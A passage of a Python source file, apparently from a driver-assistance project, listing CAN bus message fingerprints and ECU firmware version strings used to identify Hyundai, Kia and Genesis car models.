66: 8, 67: 8, 68: 8, 127: 8, 128: 8, 129: 8, 273: 8, 274: 8, 275: 8, 339: 8, 354: 3, 356: 4, 399: 8, 512: 6, 544: 8, 593: 8, 608: 8, 688: 5, 790: 8, 809: 8, 832: 8, 897: 8, 899: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1151: 6, 1168: 7, 1170: 8, 1265: 4, 1280: 1, 1282: 4, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1349: 8, 1351: 8, 1353: 8, 1356: 8, 1363: 8, 1366: 8, 1367: 8, 1369: 8, 1407: 8, 1414: 3, 1415: 8, 1419: 8, 1440: 8, 1456: 4, 1470: 8, 1486: 8, 1487: 8, 1491: 8, 1530: 8
},
{
66: 8, 67: 8, 68: 8, 127: 8, 128: 8, 129: 8, 273: 8, 274: 8, 275: 8, 339: 8, 354: 3, 356: 4, 399: 8, 512: 6, 544: 8, 593: 8, 608: 8, 688: 5, 790: 8, 809: 8, 832: 8, 897: 8, 899: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1151: 6, 1168: 7, 1170: 8, 1265: 4, 1280: 1, 1282: 4, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1349: 8, 1351: 8, 1353: 8, 1356: 8, 1363: 8, 1366: 8, 1367: 8, 1369: 8, 1407: 8, 1414: 3, 1419: 8, 1427: 6, 1440: 8, 1456: 4, 1470: 8, 1486: 8, 1487: 8, 1491: 8, 1960: 8, 1990: 8, 1998: 8, 2000: 8, 2001: 8, 2004: 8, 2005: 8, 2008: 8, 2009: 8, 2012: 8, 2013: 8, 2015: 8, 2016: 8, 2017: 8, 2024: 8, 2025: 8
}],
CAR.HYUNDAI_GENESIS: [{
67: 8, 68: 8, 304: 8, 320: 8, 339: 8, 356: 4, 544: 7, 593: 8, 608: 8, 688: 5, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 5, 897: 8, 902: 8, 903: 6, 916: 8, 1024: 2, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1168: 7, 1170: 8, 1173: 8, 1184: 8, 1265: 4, 1280: 1, 1287: 4, 1292: 8, 1312: 8, 1322: 8, 1331: 8, 1332: 8, 1333: 8, 1334: 8, 1335: 8, 1342: 6, 1345: 8, 1363: 8, 1369: 8, 1370: 8, 1371: 8, 1378: 4, 1384: 5, 1407: 8, 1419: 8, 1427: 6, 1434: 2, 1456: 4
},
{
67: 8, 68: 8, 304: 8, 320: 8, 339: 8, 356: 4, 544: 7, 593: 8, 608: 8, 688: 5, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 5, 897: 8, 902: 8, 903: 6, 916: 8, 1024: 2, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1168: 7, 1170: 8, 1173: 8, 1184: 8, 1265: 4, 1280: 1, 1281: 3, 1287: 4, 1292: 8, 1312: 8, 1322: 8, 1331: 8, 1332: 8, 1333: 8, 1334: 8, 1335: 8, 1345: 8, 1363: 8, 1369: 8, 1370: 8, 1378: 4, 1379: 8, 1384: 5, 1407: 8, 1419: 8, 1427: 6, 1434: 2, 1456: 4
},
{
67: 8, 68: 8, 304: 8, 320: 8, 339: 8, 356: 4, 544: 7, 593: 8, 608: 8, 688: 5, 809: 8, 854: 7, 870: 7, 871: 8, 872: 5, 897: 8, 902: 8, 903: 6, 912: 7, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1168: 7, 1170: 8, 1173: 8, 1184: 8, 1265: 4, 1268: 8, 1280: 1, 1281: 3, 1287: 4, 1292: 8, 1312: 8, 1322: 8, 1331: 8, 1332: 8, 1333: 8, 1334: 8, 1335: 8, 1345: 8, 1363: 8, 1369: 8, 1370: 8, 1371: 8, 1378: 4, 1384: 5, 1407: 8, 1419: 8, 1427: 6, 1434: 2, 1437: 8, 1456: 4
},
{
67: 8, 68: 8, 304: 8, 320: 8, 339: 8, 356: 4, 544: 7, 593: 8, 608: 8, 688: 5, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 5, 897: 8, 902: 8, 903: 6, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1168: 7, 1170: 8, 1173: 8, 1184: 8, 1265: 4, 1280: 1, 1287: 4, 1292: 8, 1312: 8, 1322: 8, 1331: 8, 1332: 8, 1333: 8, 1334: 8, 1335: 8, 1345: 8, 1363: 8, 1369: 8, 1370: 8, 1378: 4, 1379: 8, 1384: 5, 1407: 8, 1425: 2, 1427: 6, 1437: 8, 1456: 4
},
{
67: 8, 68: 8, 304: 8, 320: 8, 339: 8, 356: 4, 544: 7, 593: 8, 608: 8, 688: 5, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 5, 897: 8, 902: 8, 903: 6, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1168: 7, 1170: 8, 1173: 8, 1184: 8, 1265: 4, 1280: 1, 1287: 4, 1292: 8, 1312: 8, 1322: 8, 1331: 8, 1332: 8, 1333: 8, 1334: 8, 1335: 8, 1345: 8, 1363: 8, 1369: 8, 1370: 8, 1371: 8, 1378: 4, 1384: 5, 1407: 8, 1419: 8, 1425: 2, 1427: 6, 1437: 8, 1456: 4
}],
CAR.SANTA_FE: [{
67: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 544: 8, 593: 8, 608: 8, 688: 6, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1155: 8, 1156: 8, 1162: 8, 1164: 8, 1168: 7, 1170: 8, 1173: 8, 1183: 8, 1186: 2, 1191: 2, 1227: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1379: 8, 1384: 8, 1407: 8, 1414: 3, 1419: 8, 1427: 6, 1456: 4, 1470: 8
},
{
67: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 544: 8, 593: 8, 608: 8, 688: 6, 764: 8, 809: 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1064: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1155: 8, 1162: 8, 1164: 8, 1168: 7, 1170: 8, 1173: 8, 1180: 8, 1183: 8, 1186: 2, 1227: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1371: 8, 1378: 8, 1384: 8, 1407: 8, 1414: 3, 1419: 8, 1427: 6, 1456: 4, 1470: 8, 1988: 8, 2000: 8, 2004: 8, 2008: 8, 2012: 8
},
{
67: 8, 68: 8, 80: 4, 160: 8, 161: 8, 272: 8, 288: 4, 339: 8, 356: 8, 357: 8, 399: 8, 544: 8, 608: 8, 672: 8, 688: 5, 704: 1, 790: 8, 809: 8, 848: 8, 880: 8, 898: 8, 900: 8, 901: 8, 904: 8, 1056: 8, 1064: 8, 1065: 8, 1072: 8, 1075: 8, 1087: 8, 1088: 8, 1151: 8, 1200: 8, 1201: 8, 1232: 4, 1264: 8, 1265: 8, 1266: 8, 1296: 8, 1306: 8, 1312: 8, 1322: 8, 1331: 8, 1332: 8, 1333: 8, 1348: 8, 1349: 8, 1369: 8, 1370: 8, 1371: 8, 1407: 8, 1415: 8, 1419: 8, 1440: 8, 1442: 4, 1461: 8, 1470: 8
}],
CAR.SONATA: [
{67: 8, 68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 544: 8, 546: 8, 549: 8, 550: 8, 576: 8, 593: 8, 608: 8, 688: 6, 809: 8, 832: 8, 854: 8, 865: 8, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 905: 8, 908: 8, 909: 8, 912: 7, 913: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1078: 4, 1089: 5, 1096: 8, 1107: 5, 1108: 8, 1114: 8, 1136: 8, 1145: 8, 1151: 8, 1155: 8, 1156: 8, 1157: 4, 1162: 8, 1164: 8, 1168: 8, 1170: 8, 1173: 8, 1180: 8, 1183: 8, 1184: 8, 1186: 2, 1191: 2, 1193: 8, 1210: 8, 1225: 8, 1227: 8, 1265: 4, 1268: 8, 1280: 8, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1330: 8, 1339: 8, 1342: 6, 1343: 8, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1371: 8, 1378: 8, 1379: 8, 1384: 8, 1394: 8, 1407: 8, 1419: 8, 1427: 6, 1446: 8, 1456: 4, 1460: 8, 1470: 8, 1485: 8, 1504: 3, 1988: 8, 1996: 8, 2000: 8, 2004: 8, 2008: 8, 2012: 8, 2015: 8},
],
CAR.SONATA_LF: [
{66: 8, 67: 8, 68: 8, 127: 8, 273: 8, 274: 8, 275: 8, 339: 8, 356: 4, 399: 8, 447: 8, 512: 6, 544: 8, 593: 8, 608: 8, 688: 5, 790: 8, 809: 8, 832: 8, 884: 8, 897: 8, 899: 8, 902: 8, 903: 6, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1151: 6, 1168: 7, 1170: 8, 1253: 8, 1254: 8, 1255: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1314: 8, 1322: 8, 1331: 8, 1332: 8, 1333: 8, 1342: 6, 1345: 8, 1348: 8, 1349: 8, 1351: 8, 1353: 8, 1363: 8, 1365: 8, 1366: 8, 1367: 8, 1369: 8, 1397: 8, 1407: 8, 1415: 8, 1419: 8, 1425: 2, 1427: 6, 1440: 8, 1456: 4, 1470: 8, 1472: 8, 1486: 8, 1487: 8, 1491: 8, 1530: 8, 1532: 5, 2000: 8, 2001: 8, 2004: 8, 2005: 8, 2008: 8, 2009: 8, 2012: 8, 2013: 8, 2014: 8, 2016: 8, 2017: 8, 2024: 8, 2025: 8},
],
CAR.KIA_OPTIMA: [{
64: 8, 66: 8, 67: 8, 68: 8, 127: 8, 128: 8, 129: 8, 273: 8, 274: 8, 275: 8, 339: 8, 354: 3, 356: 4, 399: 8, 447: 8, 512: 6, 544: 8, 558: 8, 593: 8, 608: 8, 640: 8, 688: 5, 790: 8, 809: 8, 832: 8, 884: 8, 897: 8, 899: 8, 902: 8, 903: 6, 909: 8, 912: 7, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1151: 6, 1168: 7, 1170: 8, 1186: 2, 1191: 2, 1253: 8, 1254: 8, 1255: 8, 1265: 4, 1268: 8, 1280: 1, 1282: 4, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1331: 8, 1332: 8, 1333: 8, 1342: 6, 1345: 8, 1348: 8, 1349: 8, 1351: 8, 1353: 8, 1356: 8, 1363: 8, 1365: 8, 1366: 8, 1367: 8, 1369: 8, 1407: 8, 1414: 3, 1415: 8, 1419: 8, 1425: 2, 1427: 6, 1440: 8, 1456: 4, 1470: 8, 1472: 8, 1486: 8, 1487: 8, 1491: 8, 1492: 8, 1530: 8, 1532: 5, 1792: 8, 1872: 8, 1937: 8, 1953: 8, 1968: 8, 1988: 8, 1996: 8, 2000: 8, 2001: 8, 2004: 8, 2008: 8, 2009: 8, 2012: 8, 2015: 8, 2016: 8, 2017: 8, 2024: 8, 2025: 8, 1371: 8, 1397: 8, 1961: 8
}],
CAR.KIA_SORENTO: [{
67: 8, 68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 544: 8, 593: 8, 608: 8, 688: 5, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1064: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1168: 7, 1170: 8, 1173: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1331: 8, 1332: 8, 1333: 8, 1342: 6, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1370: 8, 1371: 8, 1384: 8, 1407: 8, 1411: 8, 1419: 8, 1425: 2, 1427: 6, 1444: 8, 1456: 4, 1470: 8, 1489: 1
}],
CAR.KIA_STINGER: [{
67: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 358: 6, 359: 8, 544: 8, 576: 8, 593: 8, 608: 8, 688: 5, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 909: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1064: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1168: 7, 1170: 8, 1173: 8, 1184: 8, 1265: 4, 1280: 1, 1281: 4, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1371: 8, 1378: 4, 1379: 8, 1384: 8, 1407: 8, 1419: 8, 1425: 2, 1427: 6, 1456: 4, 1470: 8
}],
CAR.GENESIS_G70: [{
67: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 358: 6, 544: 8, 576: 8, 593: 8, 608: 8, 688: 5, 809: 8, 832:8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 909: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1064: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1156: 8, 1168: 7, 1170: 8, 1173:8, 1184: 8, 1186: 2, 1191: 2, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1379: 8, 1384: 8, 1407: 8, 1419:8, 1427: 6, 1456: 4, 1470: 8, 1988: 8, 1996: 8, 2000: 8, 2004: 8, 2008: 8, 2012: 8, 2015: 8
}],
CAR.GENESIS_G80: [{
67: 8, 68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 358: 6, 544: 8, 593: 8, 608: 8, 688: 5, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 916: 8, 1024: 2, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1156: 8, 1168: 7, 1170: 8, 1173: 8, 1184: 8, 1191: 2, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1370: 8, 1371: 8, 1378: 4, 1384: 8, 1407: 8, 1419: 8, 1425: 2, 1427: 6, 1434: 2, 1456: 4, 1470: 8
},
{
67: 8, 68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 358: 6, 359: 8, 544: 8, 546: 8, 593: 8, 608: 8, 688: 5, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1064: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1156: 8, 1157: 4, 1168: 7, 1170: 8, 1173: 8, 1184: 8, 1265: 4, 1280: 1, 1281: 3, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1370: 8, 1371: 8, 1378: 4, 1384: 8, 1407: 8, 1419: 8, 1425: 2, 1427: 6, 1434: 2, 1437: 8, 1456: 4, 1470: 8
},
{
67: 8, 68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 358: 6, 544: 8, 593: 8, 608: 8, 688: 5, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1064: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1156: 8, 1157: 4, 1162: 8, 1168: 7, 1170: 8, 1173: 8, 1184: 8, 1193: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1371: 8, 1378: 4, 1384: 8, 1407: 8, 1419: 8, 1425: 2, 1427: 6, 1437: 8, 1456: 4, 1470: 8
}],
CAR.GENESIS_G90: [{
67: 8, 68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 358: 6, 359: 8, 544: 8, 593: 8, 608: 8, 688: 5, 809: 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1162: 4, 1168: 7, 1170: 8, 1173: 8, 1184: 8, 1265: 4, 1280: 1, 1281: 3, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1370: 8, 1371: 8, 1378: 4, 1384: 8, 1407: 8, 1419: 8, 1425: 2, 1427: 6, 1434: 2, 1456: 4, 1470: 8, 1988: 8, 2000: 8, 2003: 8, 2004: 8, 2005: 8, 2008: 8, 2011: 8, 2012: 8, 2013: 8
}],
CAR.IONIQ_EV_2020: [{
127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 524: 8, 544: 7, 593: 8, 688: 5, 832: 8, 881: 8, 882: 8, 897: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 8, 1151: 6, 1155: 8, 1156: 8, 1157: 4, 1164: 8, 1168: 7, 1173: 8, 1183: 8, 1186: 2, 1191: 2, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1379: 8, 1407: 8, 1419: 8, 1426: 8, 1427: 6, 1429: 8, 1430: 8, 1456: 4, 1470: 8, 1473: 8, 1507: 8, 1535: 8, 1988: 8, 1996: 8, 2000: 8, 2004: 8, 2005: 8, 2008: 8, 2012: 8, 2013: 8
}],
CAR.IONIQ_EV_LTD: [{
127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 7, 593: 8, 688: 5, 832: 8, 881: 8, 882: 8, 897: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 8, 1151: 6, 1168: 7, 1173: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1407: 8, 1419: 8, 1425: 2, 1426: 8, 1427: 6, 1429: 8, 1430: 8, 1456: 4, 1470: 8, 1507: 8, 1535: 8
}],
CAR.IONIQ: [{
68:8, 127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 524: 8, 544: 8, 576:8, 593: 8, 688: 5, 832: 8, 881: 8, 882: 8, 897: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1151: 6, 1155: 8, 1156: 8, 1157: 4, 1164: 8, 1168: 7, 1173: 8, 1183: 8, 1186: 2, 1191: 2, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1379: 8, 1407: 8, 1419: 8, 1426: 8, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1470: 8, 1473: 8, 1476: 8, 1507: 8, 1535: 8, 1988: 8, 1996: 8, 2000: 8, 2004: 8, 2005: 8, 2008: 8, 2012: 8, 2013: 8
}],
CAR.KONA: [{
67: 8, 127: 8, 304: 8, 320: 8, 339: 8, 354: 3, 356: 4, 544: 8, 593: 8, 608: 8, 688: 5, 809: 8, 832 : 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1064: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1156: 8, 1170: 8, 1173: 8, 1186: 2, 1191: 2, 1193: 8, 1265: 4,1280: 1, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1378: 8, 1384: 8, 1394: 8, 1407: 8, 1414: 3, 1419: 8, 1427: 6, 1456: 4, 1470: 8, 1988: 8, 1996: 8, 2000: 8, 2001: 8, 2004: 8, 2008: 8, 2009: 8, 2012: 8
}],
CAR.KONA_EV: [{
127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 549: 8, 593: 8, 688: 5, 832: 8, 881: 8, 882: 8, 897: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 8, 1151: 6, 1168: 7, 1173: 8, 1183: 8, 1186: 2, 1191: 2, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1307: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1378: 4, 1407: 8, 1419: 8, 1426: 8, 1427: 6, 1429: 8, 1430: 8, 1456: 4, 1470: 8, 1473: 8, 1507: 8, 1535: 8, 2000: 8, 2004: 8, 2008: 8, 2012: 8, 1157: 4, 1193: 8, 1379: 8, 1988: 8, 1996: 8
}],
CAR.KIA_NIRO_EV: [{
127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 516: 8, 544: 8, 593: 8, 688: 5, 832: 8, 881: 8, 882: 8, 897: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 8, 1151: 6, 1156: 8, 1157: 4, 1168: 7, 1173: 8, 1183: 8, 1186: 2, 1191: 2, 1193: 8, 1225: 8, 1260: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1407: 8, 1419: 8, 1426: 8, 1427: 6, 1429: 8, 1430: 8, 1456: 4, 1470: 8, 1473: 8, 1507: 8, 1535: 8, 1990: 8, 1998: 8, 1996: 8, 2000: 8, 2004: 8, 2008: 8, 2012: 8, 2015: 8
}],
CAR.KIA_FORTE: [{
67: 8, 127: 8, 304: 8, 320: 8, 339: 8, 354: 3, 356: 4, 544: 8, 576: 8, 593: 8, 608: 8, 688: 5, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1078: 4, 1107: 5, 1136: 8, 1156: 8, 1170: 8, 1173: 8, 1186: 2, 1191: 2, 1225: 8, 1265: 4, 1280: 4, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1384: 8, 1394: 8, 1407: 8, 1414: 3, 1419: 8, 1427: 6, 1456: 4, 1470: 8, 1988: 8, 1996: 8, 2000: 8, 2004: 8, 2008: 8, 2012: 8, 2015: 8
}],
CAR.KIA_OPTIMA_H: [{
68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 593: 8, 688: 5, 832: 8, 881: 8, 882: 8, 897: 8, 902: 8, 903: 6, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1151: 6, 1168: 7, 1173: 8, 1236: 2, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1322: 8, 1331: 8, 1332: 8, 1333: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1371: 8, 1407: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1470: 8, 1476: 8, 1535: 8
},
{
68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 593: 8, 688: 5, 881: 8, 882: 8, 897: 8, 902: 8, 903: 8, 909: 8, 912: 7, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1151: 6, 1168: 7, 1173: 8, 1180: 8, 1186: 2, 1191: 2, 1265: 4, 1268: 8, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1371: 8, 1407: 8, 1419: 8, 1420: 8, 1425: 2, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1470: 8, 1476: 8, 1535: 8
}],
CAR.PALISADE: [{
67: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 544: 8, 546: 8, 547: 8, 548: 8, 549: 8, 576: 8, 593: 8, 608: 8, 688: 6, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 905: 8, 909: 8, 913: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1064: 8, 1078: 4, 1107: 5, 1123: 8, 1136: 8, 1151: 6, 1155: 8, 1156: 8, 1157: 4, 1162: 8, 1164: 8, 1168: 7, 1170: 8, 1173: 8, 1180: 8, 1186: 2, 1191: 2, 1193: 8, 1210: 8, 1225: 8, 1227: 8, 1265: 4, 1280: 8, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1371: 8, 1378: 8, 1384: 8, 1407: 8, 1419: 8, 1427: 6, 1456: 4, 1470: 8, 1988: 8, 1996: 8, 2000: 8, 2004: 8, 2005: 8, 2008: 8, 2012: 8
}],
CAR.VELOSTER: [{
64: 8, 66: 8, 67: 8, 68: 8, 127: 8, 128: 8, 129: 8, 273: 8, 274: 8, 275: 8, 339: 8, 354: 3, 356: 4, 399: 8, 512: 6, 544: 8, 558: 8, 593: 8, 608: 8, 688: 5, 790: 8, 809: 8, 832: 8, 884: 8, 897: 8, 899: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1170: 8, 1181: 5, 1186: 2, 1191: 2, 1265: 4, 1280: 1, 1282: 4, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1349: 8, 1351: 8, 1353: 8, 1356: 8, 1363: 8, 1365: 8, 1366: 8, 1367: 8, 1369: 8, 1378: 4, 1407: 8, 1414: 3, 1415: 8, 1419: 8, 1427: 6, 1440: 8, 1456: 4, 1470: 8, 1486: 8, 1487: 8, 1491: 8, 1530: 8, 1532: 5, 1872: 8, 1988: 8, 1996: 8, 2000: 8, 2001: 8, 2004: 8, 2008: 8, 2009: 8, 2012: 8, 2015: 8, 2016: 8, 2017: 8, 2024: 8, 2025: 8
}]
}
# Don't use these fingerprints for fingerprinting, they are still used for ECU detection
IGNORED_FINGERPRINTS = [CAR.VELOSTER, CAR.GENESIS_G70, CAR.KONA]
FW_VERSIONS = {
CAR.IONIQ_EV_2020: {
(Ecu.fwdRadar, 0x7d0, None): [
b'\xf1\x00AEev SCC F-CUP 1.00 1.00 99110-G7200 ',
],
(Ecu.eps, 0x7d4, None): [
b'\xf1\x00AE MDPS C 1.00 1.01 56310/G7560 4APEC101',
],
(Ecu.fwdCamera, 0x7c4, None): [
b'\xf1\x00AEE MFC AT EUR RHD 1.00 1.01 95740-G2600 190819',
],
},
CAR.IONIQ_EV_LTD: {
(Ecu.fwdRadar, 0x7d0, None): [
b'\xf1\x00AEev SCC F-CUP 1.00 1.00 96400-G7000 ',
],
(Ecu.eps, 0x7d4, None): [
b'\xf1\x00AE MDPS C 1.00 1.02 56310G7300\x00 4AEEC102',
],
(Ecu.fwdCamera, 0x7c4, None): [
b'\xf1\x00AEE MFC AT EUR LHD 1.00 1.00 95740-G7200 160418',
],
},
CAR.SONATA: {
(Ecu.fwdRadar, 0x7d0, None): [
b'\xf1\x00DN8_ SCC FHCUP 1.00 1.01 99110-L1000 ',
b'\xf1\x00DN8_ SCC FHCUP 1.00 1.00 99110-L0000 ',
